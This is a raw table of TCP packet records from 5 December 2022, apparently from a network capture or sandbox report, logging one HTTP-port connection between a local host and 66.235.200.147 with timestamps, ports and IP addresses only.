Dec 5, 2022 01:32:31.360606909 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.360646009 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.360662937 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.360683918 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.360723019 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.360734940 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.360761881 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.360865116 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.361365080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.361404896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.361443043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.361465931 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.361481905 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.361521959 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.361532927 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.361563921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.361614943 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.362202883 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.362241030 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.362278938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.362298012 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.362317085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.362354994 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.362366915 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.362395048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.362466097 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.363095045 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.363133907 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.363173008 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.363193035 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.363212109 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.363250971 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.363259077 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.363291979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.363337994 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.363931894 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.363970995 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.364008904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.364029884 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.364049911 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.364088058 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.364099026 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.364128113 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.364176035 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.364773989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.364814043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.364854097 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.364873886 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.364892960 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.364933014 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.364943981 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.364973068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.365022898 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.365643024 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.365677118 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.365736008 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.366805077 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.366838932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.366873026 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.366911888 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.366923094 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.366957903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.366977930 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.366991997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367027044 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367041111 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.367252111 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367281914 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367333889 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.367522001 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367558956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367584944 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.367590904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367626905 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367645979 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.367662907 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367697001 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367714882 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.367731094 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.367799997 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.368402958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.368438005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.368474960 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.368494987 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.368508101 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.368544102 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.368557930 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.368613958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.368648052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.368664026 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.369334936 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.369370937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.369386911 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.369404078 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.369436979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.369452000 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.369469881 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.369505882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.369517088 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.369540930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.369627953 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.370281935 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.370315075 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.370346069 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.370372057 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.370379925 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.370414972 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.370426893 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.370449066 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.370481968 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.370495081 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.371238947 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.371283054 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.371296883 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.371315002 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.371349096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.371364117 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.371381998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.371413946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.371428967 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.371448040 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.371572018 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.372153044 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.372189045 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.372220039 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.372236013 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.372253895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.372287035 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.372298956 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.372319937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.372354031 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.372364998 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.373085022 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.373119116 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.373138905 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.373151064 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.373184919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.373198986 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.373219013 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.373253107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.373265028 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.373285055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.373397112 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.373965025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.374000072 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.374047041 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.374078989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.374080896 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.374111891 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.374144077 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.374156952 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.374176979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.374191999 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.374896049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.374931097 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.374964952 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.374978065 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.374998093 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375013113 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.375031948 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375063896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375077963 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.375097990 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375149965 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.375782013 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375813961 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375844002 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375871897 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.375874043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375905991 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375920057 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.375936985 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375967026 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.375982046 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.376723051 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.376781940 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.380990028 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381023884 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381056070 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381087065 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381119013 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381145954 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381155014 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.381155968 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.381215096 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.381242037 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381273031 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381304026 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381321907 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.381335020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381366014 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381381989 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.381397963 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381428957 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.381443977 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.382121086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.382184029 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.382191896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.382225037 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.382256031 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.382276058 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.382287025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.382318974 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.382334948 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.382356882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.382402897 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.383045912 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.383078098 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.383107901 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.383138895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.383153915 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.383172989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.383192062 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.383204937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.383235931 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.383254051 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.384012938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.384046078 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.384072065 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.384076118 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.384108067 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.384124994 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.384139061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.384170055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.384187937 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.384202003 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.384251118 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.384872913 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.384905100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.384937048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.384957075 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.384968996 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.385000944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.385019064 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.385031939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.385062933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.385080099 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.385763884 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.385806084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.385823965 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.385848045 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.385890007 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.385898113 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.385931015 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.385972023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.385987043 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.386015892 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.386070013 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.386688948 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.386735916 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.386776924 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.386811972 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.386817932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.386861086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.386872053 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.386921883 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.386962891 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.386984110 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.387615919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.387660027 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.387674093 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.387701035 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.387742043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.387753963 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.387784958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.387826920 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.387836933 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.387868881 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.387917995 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.388487101 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.388530016 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.388573885 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.388586044 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.388616085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.388658047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.388664007 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.388704062 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.388745070 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.388751030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.389383078 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.389426947 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.389440060 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.389470100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.389512062 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.389530897 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.389554977 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.389596939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.389604092 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.389640093 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.389689922 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.389916897 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.390304089 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.390585899 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.391905069 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.391948938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.391964912 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.391990900 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392031908 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392039061 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.392074108 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392110109 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392126083 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.392152071 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392194986 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392200947 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.392239094 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392281055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392299891 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.392323971 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392365932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392371893 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.392407894 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392450094 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.392456055 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.393037081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.393080950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.393117905 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.393124104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.393167019 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.393177032 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.393208981 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.393250942 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.393256903 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.393295050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.393336058 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.393341064 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.393955946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394001007 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394006014 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.394042015 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394083023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394089937 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.394124985 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394166946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394180059 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.394210100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394251108 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394256115 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.394803047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.394846916 CET	80	49704	66.235.200.147	192.168.2.3
